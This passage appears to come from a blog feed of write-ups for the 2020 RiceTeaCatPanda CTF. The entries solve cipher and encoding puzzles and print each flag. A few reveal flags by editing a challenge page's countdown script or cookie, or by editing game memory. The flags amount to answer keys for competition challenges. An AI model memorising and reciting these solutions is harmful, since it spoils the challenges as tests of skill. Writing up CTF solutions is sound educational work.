<p>The second hint gives some instructions about it: <code>Decimate</code>, <code>hexenon</code> (looks like hexa) and <code>string</code>.</p>
<p>So, we have to get digit between 0 and 9. The month number is too hight.</p>
<p>When we put together all the number, we got: <code>3563531888962843501</code>.</p>
<p>We can convert it as a hexa string and decode the result (the <code>sed</code> adds the flag part):</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">printf</span> <span class="s1">'%x'</span> <span class="m">3563531888962843501</span> <span class="p">|</span> xxd -r -p <span class="p">|</span> sed -E <span class="s1">'s/^(.*)/rtcp{\1}/'</span>
rtcp<span class="o">{</span>1t5_ch3m<span class="o">}</span>
</code></pre></div>RTCP - I Love You 30002020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-i-love-you-3000.html<p><em>solves : 22</em></p>
<div class="highlight"><pre><span></span><code>Point : 700
I Love You 3000
❤️ 144, 588, 1869, 1425, 1267, 1708, 1588, 1600, 1889, 1497, 482, 696, 731, 337, 491, 1314, 437, 1514, 1384, 1561, 419, 382, 835, 325, 1835, 1562, 1092 💔
Hint : I don't read books... do/should you?
Hint 2 : submit in the form …</code></pre></div><p><em>solves : 22</em></p>
<div class="highlight"><pre><span></span><code>Point : 700
I Love You 3000
❤️ 144, 588, 1869, 1425, 1267, 1708, 1588, 1600, 1889, 1497, 482, 696, 731, 337, 491, 1314, 437, 1514, 1384, 1561, 419, 382, 835, 325, 1835, 1562, 1092 💔
Hint : I don't read books... do/should you?
Hint 2 : submit in the form rtcp{OHMYGAWDTHISISAWHOLEWORD}
</code></pre></div>
<p>No clue of what can be <code>I love you 3000</code>. I search for it and found some informations:</p>
<ul>
<li>a song : <a href="https://www.youtube.com/watch?v=cPkE0IbDVs4">https://www.youtube.com/watch?v=cPkE0IbDVs4</a></li>
<li>some article about the last Avengers movie : <a href="https://www.insider.com/avengers-endgame-robert-downey-jr-i-love-you-3000-2019-5">https://www.insider.com/avengers-endgame-robert-downey-jr-i-love-you-3000-2019-5</a></li>
<li>a IT virus : <a href="https://en.wikipedia.org/wiki/ILOVEYOU">https://en.wikipedia.org/wiki/ILOVEYOU</a></li>
</ul>
<p>The last point is the most relevant for our search. With its name and github, we can found the source code <a href="https://github.com/onx/ILOVEYOU">https://github.com/onx/ILOVEYOU</a>.</p>
<p>We got a love letter that correspond to our challenge : <a href="https://github.com/onx/ILOVEYOU/blob/master/LOVE-LETTER-FOR-YOU.TXT.vbs">https://github.com/onx/ILOVEYOU/blob/master/LOVE-LETTER-FOR-YOU.TXT.vbs</a>.</p>
<p>We need to found now what are the number and how we can combine the both?</p>
<p>Some looking on the dcode.fr website, we found a <a href="https://www.dcode.fr/book-cipher">cipher</a> using number as word/letter references for a text/book.</p>
<p>We enter all the source code as book to use and the number as indexes. We got the flag : <code>RTCP{I10V3H0WBROKENMY3MAILZR}</code>.</p>RTCP - No Sleep2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-no-sleep.html<p><em>solves : 138</em></p>
<div class="highlight"><pre><span></span><code>Point : 765
Jess doesn't get enough sleep, since he's such a gamer so in this challenge, you'll be staying up with him until 4:00 in the morning :D on a Monday! Let's go, gamers!
</code></pre></div>
<p>The webpage show a JS countdown until when the …</p><p><em>solves : 138</em></p>
<div class="highlight"><pre><span></span><code>Point : 765
Jess doesn't get enough sleep, since he's such a gamer so in this challenge, you'll be staying up with him until 4:00 in the morning :D on a Monday! Let's go, gamers!
</code></pre></div>
<p>The webpage show a JS countdown until when the flag will be show. But, we can't wait that long to get the flag!</p>
<p><img alt="nosleep.png" src="https://blog.nlegall.fr/images/rtcp/nosleep.png"></p>
<p>We have two way to do it. The both can be done without leaving the browser.</p>
<h2>JS</h2>
<p>If you read the JS code inside the page, you can see that the date is setup with the two first value on the tab.</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">_0x1d8e</span><span class="o">=</span><span class="p">[</span><span class="s1">'gamerfuel=Jan\x2027,\x208020\x2004:20:00'</span><span class="p">,</span><span class="s1">'Jan\x2027,\x208020\x2004:20:00'</span><span class="p">,</span><span class="s1">'getTime'</span><span class="p">,</span><span class="s1">'exec'</span><span class="p">,</span><span class="s1">'floor'</span><span class="p">,</span><span class="s1">'getElementById'</span><span class="p">,</span><span class="s1">'gamer\x20timer'</span><span class="p">,</span><span class="s1">'AES'</span><span class="p">,</span><span class="s1">'decrypt'</span><span class="p">,</span><span class="s1">'U2FsdGVkX18kRm6FDkRVQfVuNPTxyOnJzpu8QnI/9UKoCXp6hQcley11nBnLIItj'</span><span class="p">,</span><span class="s1">'ok\x20boomer'</span><span class="p">,</span><span class="s1">'innerHTML'</span><span class="p">,</span><span class="s1">'Utf8'</span><span class="p">,</span><span class="s1">'cookie'</span><span class="p">];(</span><span class="kd">function</span><span class="p">(</span><span class="nx">_0x29eed8</span><span class="p">,</span><span class="nx">_0x4bb4aa</span><span class="p">){</span><span class="kd">var</span> <span class="nx">_0x47e29c</span><span class="o">=</span><span class="kd">function</span><span class="p">(</span><span class="nx">_0x2d3fd2</span><span class="p">){</span><span class="k">while</span><span class="p">(</span><span class="o">--</span><span class="nx">_0x2d3fd2</span><span class="p">){</span><span class="nx">_0x29eed8</span><span class="p">[</span><span class="s1">'push'</span><span class="p">](</span><span class="nx">_0x29eed8</span><span class="p">[</span><span class="s1">'shift'</span><span class="p">]());}};</span><span class="nx">_0x47e29c</span><span class="p">(</span><span class="o">++</span><span class="nx">_0x4bb4aa</span><span class="p">);}(</span><span class="nx">_0x1d8e</span><span class="p">,</span><span class="mh">0x99</span><span class="p">));</span><span class="kd">var</span> <span class="nx">_0x2ad1</span><span class="o">=</span><span class="kd">function</span><span class="p">(</span><span class="nx">_0x545e19</span><span class="p">,</span><span class="nx">_0x47cdd3</span><span class="p">){</span><span class="nx">_0x545e19</span><span class="o">=</span><span class="nx">_0x545e19</span><span class="o">-</span><span class="mh">0x0</span><span class="p">;</span><span class="kd">var</span> <span class="nx">_0x4275c2</span><span class="o">=</span><span class="nx">_0x1d8e</span><span class="p">[</span><span class="nx">_0x545e19</span><span class="p">];</span><span class="k">return</span> <span class="nx">_0x4275c2</span><span class="p">;};</span><span class="nb">document</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x0'</span><span class="p">)]</span><span class="o">=</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x1'</span><span class="p">);</span><span class="kd">var</span> <span class="nx">countDownDate</span><span class="o">=</span><span class="k">new</span> <span class="nb">Date</span><span class="p">(</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x2'</span><span class="p">))[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x3'</span><span class="p">)]();</span><span class="kd">var</span> <span class="nx">x</span><span class="o">=</span><span class="nx">setInterval</span><span class="p">(</span><span class="kd">function</span><span class="p">(){</span><span class="kd">var</span> <span class="nx">_0x27a8c6</span><span class="o">=</span><span class="k">new</span> <span class="nb">Date</span><span class="p">(</span><span class="sr">/[^=]*$/</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x4'</span><span class="p">)](</span><span class="nb">document</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x0'</span><span class="p">)])[</span><span class="mh">0x0</span><span class="p">])[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x3'</span><span class="p">)]();</span><span class="kd">var</span> <span class="nx">_0x5b92f1</span><span class="o">=</span><span class="k">new</span> <span class="nb">Date</span><span class="p">()[</span><span class="s1">'getTime'</span><span class="p">]();</span><span class="kd">var</span> <span class="nx">_0x3a5a33</span><span class="o">=</span><span class="nx">_0x27a8c6</span><span class="o">-</span><span class="nx">_0x5b92f1</span><span class="p">;</span><span class="kd">var</span> <span class="nx">_0x4214a2</span><span class="o">=</span><span class="nb">Math</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x5'</span><span class="p">)](</span><span class="nx">_0x3a5a33</span><span class="o">/</span><span class="p">(</span><span class="mh">0x3e8</span><span class="o">*</span><span class="mh">0x3c</span><span class="o">*</span><span class="mh">0x3c</span><span class="o">*</span><span class="mh">0x18</span><span class="p">));</span><span class="kd">var</span> <span class="nx">_0x48c0d9</span><span class="o">=</span><span class="nb">Math</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x5'</span><span class="p">)](</span><span class="nx">_0x3a5a33</span><span class="o">%</span><span class="p">(</span><span class="mh">0x3e8</span><span class="o">*</span><span class="mh">0x3c</span><span class="o">*</span><span class="mh">0x3c</span><span class="o">*</span><span class="mh">0x18</span><span class="p">)</span><span class="o">/</span><span class="p">(</span><span class="mh">0x3e8</span><span class="o">*</span><span class="mh">0x3c</span><span class="o">*</span><span class="mh">0x3c</span><span class="p">));</span><span class="kd">var</span> <span class="nx">_0x2de271</span><span class="o">=</span><span class="nb">Math</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x5'</span><span class="p">)](</span><span class="nx">_0x3a5a33</span><span class="o">%</span><span class="p">(</span><span class="mh">0x3e8</span><span class="o">*</span><span class="mh">0x3c</span><span class="o">*</span><span class="mh">0x3c</span><span class="p">)</span><span class="o">/</span><span class="p">(</span><span class="mh">0x3e8</span><span class="o">*</span><span class="mh">0x3c</span><span class="p">));</span><span class="kd">var</span> <span class="nx">_0x240ffb</span><span class="o">=</span><span class="nb">Math</span><span class="p">[</span><span class="s1">'floor'</span><span class="p">](</span><span class="nx">_0x3a5a33</span><span class="o">%</span><span class="p">(</span><span class="mh">0x3e8</span><span class="o">*</span><span class="mh">0x3c</span><span class="p">)</span><span class="o">/</span><span class="mh">0x3e8</span><span class="p">);</span><span class="nb">document</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x6'</span><span class="p">)](</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x7'</span><span class="p">))[</span><span class="s1">'innerHTML'</span><span class="p">]</span><span class="o">=</span><span class="nx">_0x4214a2</span><span class="o">+</span><span class="s1">'d\x20'</span><span class="o">+</span><span class="nx">_0x48c0d9</span><span class="o">+</span><span class="s1">'h\x20'</span><span class="o">+</span><span class="nx">_0x2de271</span><span class="o">+</span><span class="s1">'m\x20'</span><span class="o">+</span><span class="nx">_0x240ffb</span><span class="o">+</span><span class="s1">'s\x20'</span><span class="p">;</span><span class="k">if</span><span class="p">(</span><span class="nx">_0x3a5a33</span><span class="o"><</span><span class="mh">0x0</span><span class="p">){</span><span class="nx">clearInterval</span><span class="p">(</span><span class="nx">x</span><span class="p">);</span><span class="kd">var</span> <span class="nx">_0x1018af</span><span class="o">=</span><span class="nx">CryptoJS</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x8'</span><span class="p">)][</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x9'</span><span class="p">)](</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0xa'</span><span class="p">),</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0xb'</span><span class="p">));</span><span class="nb">document</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x6'</span><span class="p">)](</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x7'</span><span class="p">))[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0xc'</span><span class="p">)]</span><span class="o">=</span><span class="nx">_0x1018af</span><span class="p">[</span><span class="s1">'toString'</span><span class="p">](</span><span class="nx">CryptoJS</span><span class="p">[</span><span class="s1">'enc'</span><span class="p">][</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0xd'</span><span class="p">)]);}},</span><span class="mh">0x3e8</span><span class="p">);</span>
</code></pre></div>
<p>We can edit them to a past day and copy/past all the new code to the web console.</p>
<div class="highlight"><pre><span></span><code><span class="nx">gamerfuel</span><span class="o">=</span><span class="s1">'Jan\x2027,\x202017\x2004:20:00'</span><span class="p">,</span><span class="s1">'Jan\x2027,\x2082017\x2004:20:00'</span>
</code></pre></div>
<h2>Cookie</h2>
<p>The date setup with the JS code is stocked on a cookie. As we did for the JS exploit, we can edit the cookie to a new past day.</p>
<p><code>Jan 27, 2017 04:20:00</code></p>
<p>The result is the same. The flag appears:</p>
<div class="highlight"><pre><span></span><code>Jess will let you be a real gamer in:
rtcp{w0w_d1d_u_st4y_up?}
</code></pre></div>RTCP - notice me senpai2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-notice-me-senpai.html<p><em>solves : 552</em></p>
<div class="highlight"><pre><span></span><code>Point : 100
uwu...senpai placed this note on my desk before class but i cant wead what it says!!!!!! can you hewp me????????? uwu tysm
tlyrc_o_0pnvhu}{137rmi__i_omwm
Challenge Author: Jess (the other one)/J
</code></pre></div>
<p>Ok, no clue for how start this challenge. We saw some strange ponctuation (6 …</p><p><em>solves : 552</em></p>
<div class="highlight"><pre><span></span><code>Point : 100
uwu...senpai placed this note on my desk before class but i cant wead what it says!!!!!! can you hewp me????????? uwu tysm
tlyrc_o_0pnvhu}{137rmi__i_omwm
Challenge Author: Jess (the other one)/J
</code></pre></div>
<p>Ok, no clue for how start this challenge. We saw some strange ponctuation (6 exclamation marks and 9 interrogation ones). We can gues that we are looking for a cipher who may use two parameters.</p>
<p>From a previous CTF, I discover the <a href="https://en.wikipedia.org/wiki/Rail_fence_cipher">Rail fence cipher</a>. It's a basic text to text cipher. The website <a href="https://www.geocachingtoolbox.com/index.php?lang=en&page=railFenceCipher">Geocaching Toolbox</a> offers to decode with parameters. Some other well know website (dCode or Cryptii) don't use any parameters to decode it.</p>
<p><img alt="noticemesenpai" src="https://blog.nlegall.fr/images/rtcp/noticemesenpai.png"></p>
<p>Hop ! Done with this chall : <code>rtcp{im_1n_lov3_wi7h_y0ur_mom}</code>.</p>RTCP - pandamonium2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-pandamonium.html<p><em>solves : 58</em></p>
<div class="highlight"><pre><span></span><code>Point : 100
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
91 7 10 D 95 42 28 A
hint: underscore between 6th and 7th char, not including the flag wrapping (rtcp{})
</code></pre></div>
<p>We got some random number with a really nice description.</p>
<p>The number represent the chemical elements of the periodic table. </p>
<p><img alt="" src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2e/Simple_Periodic_Table_Chart-en.svg/640px-Simple_Periodic_Table_Chart-en.svg.png"></p>
<table>
<thead>
<tr>
<th>Number</th>
<th>Element</th>
</tr>
</thead>
<tbody>
<tr>
<td>91</td>
<td>Pa …</td></tr></tbody></table><p><em>solves : 58</em></p>
<div class="highlight"><pre><span></span><code>Point : 100
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
91 7 10 D 95 42 28 A
hint: underscore between 6th and 7th char, not including the flag wrapping (rtcp{})
</code></pre></div>
<p>We got some random number with a really nice description.</p>
<p>The number represent the chemical elements of the periodic table. </p>
<p><img alt="" src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2e/Simple_Periodic_Table_Chart-en.svg/640px-Simple_Periodic_Table_Chart-en.svg.png"></p>
<table>
<thead>
<tr>
<th>Number</th>
<th>Element</th>
</tr>
</thead>
<tbody>
<tr>
<td>91</td>
<td>Pa</td>
</tr>
<tr>
<td>7</td>
<td>N</td>
</tr>
<tr>
<td>10</td>
<td>Ne</td>
</tr>
<tr>
<td>D</td>
<td>-</td>
</tr>
<tr>
<td>95</td>
<td>Am</td>
</tr>
<tr>
<td>42</td>
<td>Mo</td>
</tr>
<tr>
<td>28</td>
<td>Ni</td>
</tr>
<tr>
<td>A</td>
<td>-</td>
</tr>
</tbody>
</table>
<p>So, final flag is : <code>rtcp{PaNNeDAmMoNiA}</code>.</p>RTCP - Pandas Like Salads2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-pandas-like-salads.html<p><em>solves : 154</em></p>
<div class="highlight"><pre><span></span><code>Point : 350
Did you know a new panda was added to the Washington DC zoo recently? Yep, apparently she really like salads. Interesting, yeah? Also, the panda keepers of the zoo said that the key to happiness in life is a little CUTENESS every day. You know, all …</code></pre></div><p><em>solves : 154</em></p>
<div class="highlight"><pre><span></span><code>Point : 350
Did you know a new panda was added to the Washington DC zoo recently? Yep, apparently she really like salads. Interesting, yeah? Also, the panda keepers of the zoo said that the key to happiness in life is a little CUTENESS every day. You know, all the keepers who are on the panda's rotation all said the same thing to me. Very interesting.
</code></pre></div>
<p><img alt="pandas_like_salads.png" src="https://raw.githubusercontent.com/JEF1056/riceteacatpanda/master/Pandas%20Like%20Salads%20(350)/pandas_like_salads.png"></p>
<p>Ok, we have a strange alphabet. I remember a book read a lot time ago about it. It's call the <a href="https://en.wikipedia.org/wiki/Pigpen_cipher">Pigpen cipher</a>. We got then the first step : <code>ysay{hjkahr_qqgdia_unr_kw_yrq_pm_nnfb}</code>.</p>
<p>We need to decode it again. We got a key from the description (<code>CUTNESS</code>). With this key, we can try to decode with the <a href="https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher">Vigenère cipher</a>.
We got then <code>wyhu{ufsifx_xmtzqi_sty_gj_uzy_ns_ujsx}</code>. Ok, one more step is still required. We can notice than all the start (<code>wyhu</code>) is ahead of 5 letters than the standard start. We can use Caesar cipher to perfom it with using 21 (26-5) as key : <code>rtcp{pandas_should_not_be_put_in_pens}</code>.</p>RTCP - Strong Password2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-strong-password.html<p><em>solves : 484</em></p>
<div class="highlight"><pre><span></span><code><span class="n">Point</span> <span class="o">:</span> <span class="mi">1</span>
<span class="n">Eat</span><span class="o">,</span> <span class="n">Drink</span><span class="o">,</span> <span class="n">Pet</span><span class="o">,</span> <span class="n">Hug</span><span class="o">,</span> <span class="n">Repeat</span><span class="o">!</span>
<span class="n">flags</span> <span class="n">are</span> <span class="n">entered</span> <span class="k">in</span> <span class="n">the</span> <span class="n">format</span> <span class="n">rtcp</span><span class="o">{</span><span class="n">flag</span><span class="o">}</span>
</code></pre></div>
<p>The first falg I got during this CTF. The solution is the name of the CTF itself : you eat rice, you drink tea, you pet the cat and hug the panda.</p>
<p>So, the …</p><p><em>solves : 484</em></p>
<div class="highlight"><pre><span></span><code><span class="n">Point</span> <span class="o">:</span> <span class="mi">1</span>
<span class="n">Eat</span><span class="o">,</span> <span class="n">Drink</span><span class="o">,</span> <span class="n">Pet</span><span class="o">,</span> <span class="n">Hug</span><span class="o">,</span> <span class="n">Repeat</span><span class="o">!</span>
<span class="n">flags</span> <span class="n">are</span> <span class="n">entered</span> <span class="k">in</span> <span class="n">the</span> <span class="n">format</span> <span class="n">rtcp</span><span class="o">{</span><span class="n">flag</span><span class="o">}</span>
</code></pre></div>
<p>The first falg I got during this CTF. The solution is the name of the CTF itself : you eat rice, you drink tea, you pet the cat and hug the panda.</p>
<p>So, the final flag is : <code>rtcp{rice_tea_cat_panda}</code></p>RTCP - Tea clicker2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-tea-clicker.html<p><em>solves : 138</em></p>
<div class="highlight"><pre><span></span><code>Point : 150
It's not too far back in my memory when cookie clickers were all the rage. But this new one with tea and cats has such great art and themes, I'm hooked! Unfortunately, the only reward is so many clicks away, and even if I …</code></pre></div><p><em>solves : 138</em></p>
<div class="highlight"><pre><span></span><code>Point : 150
It's not too far back in my memory when cookie clickers were all the rage. But this new one with tea and cats has such great art and themes, I'm hooked! Unfortunately, the only reward is so many clicks away, and even if I spend double the time, I still can't get it!
</code></pre></div>
<p>This challenge remember me some old games with <a href="https://cheatengine.org/">CheatEngine</a>. This program allows you to edit the memory value with a GUI and some nice search functions. If you don't have Windows, you can install it through Wine or using <a href="https://github.com/scanmem/scanmem">GameConqueror</a> (GUI for scanmem).</p>
<p>The both use the same workflow. You need to select the correct value or select all type, search a first time with the current one (for exemple <code>0</code> as it is the start score), make some change to the value and repeat the search. If you get again a lot of addresses in return, you can edit it again and search again.</p>
<p>I searched three times and I got only one value. You double click on it and, then, edit it from the below tab.</p>
<p><img alt="teaclicker.png" src="https://blog.nlegall.fr/images/rtcp/teaclicker.png"></p>
<p>As soon as you submit your edit, the flag replace the target score:</p>
<p><img alt="teaclicker2.png" src="https://blog.nlegall.fr/images/rtcp/teaclicker2.png"></p>RTCP - That's a Lot of Stuff...2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-thats-a-lot-of-stuff.html<p><em>solves : 154</em></p>
<div class="highlight"><pre><span></span><code>Point : 275
Do you want some numbers? Here, take these numbers. I don't need them anyways. I have too many numbers at home, so go on, take them. Shoves numbers towards the computer screen
31 34 33 20 31 35 36 20 31 32 32 20 31 …</code></pre></div><p><em>solves : 154</em></p>
<div class="highlight"><pre><span></span><code>Point : 275
Do you want some numbers? Here, take these numbers. I don't need them anyways. I have too many numbers at home, so go on, take them. Shoves numbers towards the computer screen
31 34 33 20 31 35 36 20 31 32 32 20 31 35 32 20 31 34 33 20 31 31 30 20 31 36 34 20 31 35 32 20 31 31 35 20 31 30 37 20 36 35 20 36 32 20 31 31 35 20 36 33 20 31 31 32 20 31 37 32 20 31 31 35 20 31 32 34 20 31 30 32 20 31 36 35 20 31 34 33 20 36 31 20 37 31 20 31 35 30 20 31 34 33 20 31 35 32 20 31 31 36 20 31 34 36 20 31 31 36 20 31 30 36 20 37 31 20 31 35 32 20 31 31 35 20 31 30 34 20 31 30 32 20 31 31 35 20 31 33 30 20 36 32 20 31 31 35 20 36 30 20 31 34 34 20 31 31 30 20 31 31 36 20 37 31
</code></pre></div>
<p>He have a hex value chain. First, decode it with <code>xxd</code> :</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"31 34 33 20 31 35 36 20 31 32 32 20 31 35 32 20 31 34 33 20 31 31 30 20 31 36 34 20 31 35 32 20 31 31 35 20 31 30 37 20 36 35 20 36 32 20 31 31 35 20 36 33 20 31 31 32 20 31 37 32 20 31 31 35 20 31 32 34 20 31 30 32 20 31 36 35 20 31 34 33 20 36 31 20 37 31 20 31 35 30 20 31 34 33 20 31 35 32 20 31 31 36 20 31 34 36 20 31 31 36 20 31 30 36 20 37 31 20 31 35 32 20 31 31 35 20 31 30 34 20 31 30 32 20 31 31 35 20 31 33 30 20 36 32 20 31 31 35 20 36 30 20 31 34 34 20 31 31 30 20 31 31 36 20 37 31"</span> <span class="p">|</span> xxd -r -p
<span class="m">143</span> <span class="m">156</span> <span class="m">122</span> <span class="m">152</span> <span class="m">143</span> <span class="m">110</span> <span class="m">164</span> <span class="m">152</span> <span class="m">115</span> <span class="m">107</span> <span class="m">65</span> <span class="m">62</span> <span class="m">115</span> <span class="m">63</span> <span class="m">112</span> <span class="m">172</span> <span class="m">115</span> <span class="m">124</span> <span class="m">102</span> <span class="m">165</span> <span class="m">143</span> <span class="m">61</span> <span class="m">71</span> <span class="m">150</span> <span class="m">143</span> <span class="m">152</span> <span class="m">116</span> <span class="m">146</span> <span class="m">116</span> <span class="m">106</span> <span class="m">71</span> <span class="m">152</span> <span class="m">115</span> <span class="m">104</span> <span class="m">102</span> <span class="m">115</span> <span class="m">130</span> <span class="m">62</span> <span class="m">115</span> <span class="m">60</span> <span class="m">144</span> <span class="m">110</span> <span class="m">116</span> <span class="m">71</span>
</code></pre></div>
<p>Ok. We got a new encoded string. All the characteres are not above 7 (0-7), that is the Octal encoding. We can decode it with <code>printf</code> function with some corrections on this string :</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">printf</span> <span class="k">$(</span><span class="nb">echo</span> <span class="s2">"143 156 122 152 143 110 164 152 115 107 65 62 115 63 112 172 115 124 102 165 143 61 71 150 143 152 116 146 116 106 71 152 115 104 102 115 130 62 115 60 144 110 116 71"</span> <span class="p">|</span> sed -E <span class="s1">'s/^(.*)/\\\1/'</span> <span class="p">|</span> sed <span class="s1">'s/ /\\/g'</span><span class="k">)</span>
cnRjcHtjMG52M3JzMTBuc19hcjNfNF9jMDBMX2M0dHN9
</code></pre></div>
<p>Perfect. We got, again a new encoded string. We don't have the typical padding <code>==</code> of base64 but it's still base64 encoded string.</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> -n <span class="s2">"cnRjcHtjMG52M3JzMTBuc19hcjNfNF9jMDBMX2M0dHN9"</span> <span class="p">|</span> base64 -d
rtcp<span class="o">{</span>c0nv3rs10ns_ar3_4_c00L_c4ts<span class="o">}</span>
</code></pre></div>
<h2>One line version</h2>
<div class="highlight"><pre><span></span><code>$ <span class="nb">printf</span> <span class="k">$(</span><span class="nb">echo</span> <span class="s2">"31 34 33 20 31 35 36 20 31 32 32 20 31 35 32 20 31 34 33 20 31 31 30 20 31 36 34 20 31 35 32 20 31 31 35 20 31 30 37 20 36 35 20 36 32 20 31 31 35 20 36 33 20 31 31 32 20 31 37 32 20 31 31 35 20 31 32 34 20 31 30 32 20 31 36 35 20 31 34 33 20 36 31 20 37 31 20 31 35 30 20 31 34 33 20 31 35 32 20 31 31 36 20 31 34 36 20 31 31 36 20 31 30 36 20 37 31 20 31 35 32 20 31 31 35 20 31 30 34 20 31 30 32 20 31 31 35 20 31 33 30 20 36 32 20 31 31 35 20 36 30 20 31 34 34 20 31 31 30 20 31 31 36 20 37 31"</span> <span class="p">|</span> xxd -r -p <span class="p">|</span> sed -E <span class="s1">'s/^(.*)/\\\1/'</span> <span class="p">|</span> sed <span class="s1">'s/ /\\/g'</span><span class="k">)</span> <span class="p">|</span> base64 -d
rtcp<span class="o">{</span>c0nv3rs10ns_ar3_4_c00L_c4ts<span class="o">}</span>
</code></pre></div>RTCP - That's Some Interesting Tea(rs)2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-thats-some-interesting-tears.html<p><em>solves : 177</em></p>
<div class="highlight"><pre><span></span><code>Point : 175
You know, the tears of one's enemies works lovely in tea. Turns out, there's tons of different bases for tea. In fact, I think I heard Delphine talk about this chef website she used for her tea base combinations...
Oh! Speaking of which, GIANt …</code></pre></div><p><em>solves : 177</em></p>
<div class="highlight"><pre><span></span><code>Point : 175
You know, the tears of one's enemies works lovely in tea. Turns out, there's tons of different bases for tea. In fact, I think I heard Delphine talk about this chef website she used for her tea base combinations...
Oh! Speaking of which, GIANt wants Delphine to make him tea... all he has is the tea leaves and the cup though. Maybe you can help Delphine, since she's really busy with cooking other things?
O53GG4CSJRHEWQT2GJ5HC4CGOM4VKY3SOZGECZ2YNJTXO6LROV3DIR3CK4ZEMWCDHFMTOWSXGRSHU23DLJVTS5BXOQZXMU3ONJSFKRCVO5BEGVSELJSGUNSYLI2XQ32UOI3FKWDYMJQWOMKQOJ4XIU2WN5KTKWT2INUW44SZONGUUN2BMFRTQQJYKM3WGSSUNVXGEU3THFIFUSDHIVWVEQ3LJVUXEMSXK5MXSZ3TG5JXORKTMZRFIVQ=
</code></pre></div>
<p>The description gives us some clues : we are looking for the "chef" website and using combinations. A well know website <a href="https://gchq.github.io/CyberChef/">CyberChef</a> allow to perform directly online a bunch of encode/decode and encrypt/decrypt texts and files.</p>
<p>Ok, we got the website! Now, we have to figure out which encoding was used. We input the text and CyberChef offers to already add some "recipes" from this input : <code>base32</code> and <code>base58</code>. Hum, it seems to only use <code>base</code> encoding and chain it. We can add the other base encoding present on the website :</p>
<table>
<thead>
<tr>
<th>Text</th>
<th>Base used</th>
<th>Result</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>O53GG4CSJRHEWQT2[...]XORKTMZRFIVQ=</code></td>
<td>base32</td>
<td><code>wvcpRLNKBz2zqpFs[...]Yygs7SwESfbTV</code></td>
</tr>
<tr>
<td><code>wvcpRLNKBz2zqpFs[...]Yygs7SwESfbTV</code></td>
<td>base58</td>
<td><code>BGJz4dCH0UuQZ2Q9[...]iOvz2DYGDb9dh</code></td>
</tr>
<tr>
<td><code>BGJz4dCH0UuQZ2Q9[...]iOvz2DYGDb9dh</code></td>
<td>base62</td>
<td><code>RWNiZjFIWldwWEY+[...]kV0Y+R2FvRisi</code></td>
</tr>
<tr>
<td><code>RWNiZjFIWldwWEY+[...]kV0Y+R2FvRisi</code></td>
<td>base64</td>
<td><code>Ecbf1HZWpXF>[D_0[...]0QT$WF>GaoF+"</code></td>
</tr>
<tr>
<td><code>Ecbf1HZWpXF>[D_0[...]0QT$WF>GaoF+"</code></td>
<td>base85</td>
<td><code>rtcp{th4t5_50m3_54lty_t34_1_bl4m3_4ll_th0s3_t34rs}</code></td>
</tr>
</tbody>
</table>
<p>If you didn't know about this website, I recommend you to bookmark it. The automatic tool may help you with some case to find what was used.</p>RTCP - Treeeeeeee2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-treeeeeeee.html<p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 200
It appears that my cat has gotten itself stuck in a tree... It's really tall and I can't seem to reach it. Maybe you can throw a snake at the tree to find it?
